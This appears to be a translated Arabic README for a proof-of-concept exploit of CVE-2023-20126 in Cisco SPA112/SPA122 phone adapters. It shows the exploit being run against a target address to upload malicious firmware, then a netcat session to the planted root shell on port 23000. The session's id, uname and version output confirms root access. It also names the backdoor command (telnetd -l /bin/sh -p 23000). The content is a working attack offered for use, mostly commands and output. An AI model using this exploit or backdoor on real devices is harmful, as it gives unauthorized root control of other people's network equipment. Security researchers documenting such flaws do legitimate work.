
استغلال إثبات المفهوم لـ CVE-2023-20126 يستهدف محولات هواتف Cisco SPA. يرفع برنامجًا ثابتًا ضارًا للحصول على جذر الصدفة على المنفذ 23000/tcp عبر telnetd.
أدنى حد من الإثبات القابل للتطبيق لـ CVE-2023-20126
هذا هو الإصدار الأولي. إنه يعمل، لكنه استغلال 'أبسط حالة'.
تم اختباره ويعمل على SPA112/SPA122 - يتطلب SPA232D صورة برنامج ثابت مختلفة.
يعطي شيل جذر على المنفذ 23000/tcp.
ما زلت بحاجة إلى تنظيف سلسلة الأدوات المستخدمة لتحرير البرنامج الثابت وسأضعها على الأرجح في مستودع مختلف. إنها تعتمد بشكل أساسي على عمل @BigNerd95، ولكن مع تعديلات طفيفة للعمل مع ملفات البرنامج الثابت لـ SPA112/122.
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.
< wait a few mins, nervously >
$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????
BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
telnetd -l /bin/sh -p 23000، مما يعطي شيل جذر على المنفذ 23000/tcp. بناءً على عمل bignerd95.WTFPL.
استخدم مشكلة git.
إذا قام هذا بتعطيل جهازك اللعين، فلا أتحمل أي مسؤولية.
هذه مشكلتك أنت.
أعني، لقد قمت بتجميع ذلك البرنامج الثابت المخترق في أمسية.
أيضًا، لماذا لا تتبع الشرح وتبني برنامجك الثابت المخترق بنفسك؟